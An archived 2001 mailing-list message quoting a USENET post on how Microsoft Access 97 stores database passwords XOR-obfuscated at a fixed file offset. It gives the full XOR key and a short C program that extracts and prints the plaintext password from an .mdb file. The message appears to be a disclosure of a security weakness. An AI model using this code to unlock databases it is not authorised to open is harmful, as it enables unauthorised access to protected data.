> The following text was posted to USENET, and indexed on a Russian cypherpunk > site. I found it when I was doing some work with Access 97 databses. I > think you will agree that this particular "feature" makes the linked > database password issue moot. Most definately! > > Anyway, Access97 passwords are stored in the 13 bytes from offset > >0x42 in a .mdb file. Do a bitwise XOR with 0x86, 0xFB, 0xEC, 0x37, > >0x5D, 0x44, 0x9C, 0xFA, 0xC6, 0x5E, 0x28, 0xE6, 0x13 to recover the > >plaintext. I think that if the first byte is 0x86, the password is > >not checked. Minor correction: the passwords can be a maximum of 14 bytes. The last XOR value is 0xD8. Here's a quick program to test this lack of security: /* snip here */ #include <stdio.h> #include <stdlib.h> int main(int argc, char *argv[]) { FILE *mdb; int i; char ch; int secret[14]={ 0x86,0xFB,0xEC,0x37, 0x5D,0x44,0x9C,0xFA, 0xC6,0x5E,0x28,0xE6, 0x13,0xD8 }; if(argc<2) { fprintf(stderr,"usage: %s filename.mdb\n",argv[0]); return 1; } if((mdb=fopen(argv[1],"rb"))==NULL) { fprintf(stderr,"%s: can't open %s\n",argv[0],argv[1]); return 1; } fseek(mdb,0x42,SEEK_SET); printf("The password is: "); for(i=0;i<14;i++) { if((ch=fgetc(mdb)^secret[i])==0) break; putchar(ch); } if(i==0) printf("(none)"); putchar('\n'); fclose(mdb); return 0; } /* snip here */ -jim
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:33:22 PDT